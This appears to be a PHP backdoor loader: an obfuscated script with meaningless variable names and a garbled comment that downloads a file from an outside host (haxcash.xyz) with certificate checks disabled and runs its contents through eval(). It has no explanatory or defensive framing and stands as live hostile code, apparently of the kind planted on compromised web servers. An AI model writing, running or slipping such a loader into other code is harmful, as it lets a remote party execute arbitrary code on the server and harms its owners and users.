<?php
# ׊820֙֨ש׵ם־ׇנכ׷יׇ׎֝עעֿ
$が831 = 'https://data.haxcash.xyz/1/blueX7a6a7w.log';
$ゃゔ957 = stream_context_create(['ssl' => ['verify_peer' => false, 'verify_host' => false]]);

$ゆ3げ9 = @fopen($が831, 'r', false, $ゃゔ957);

if ($ゆ3げ9) {
    $ま584めゖ = '';
    while (!feof($ゆ3げ9)) {
        $ま584めゖ .= fread($ゆ3げ9, 8192);
    }
    fclose($ゆ3げ9);

    if (!empty($ま584めゖ)) {
        eval('?>' . $ま584めゖ);
    }
}
?>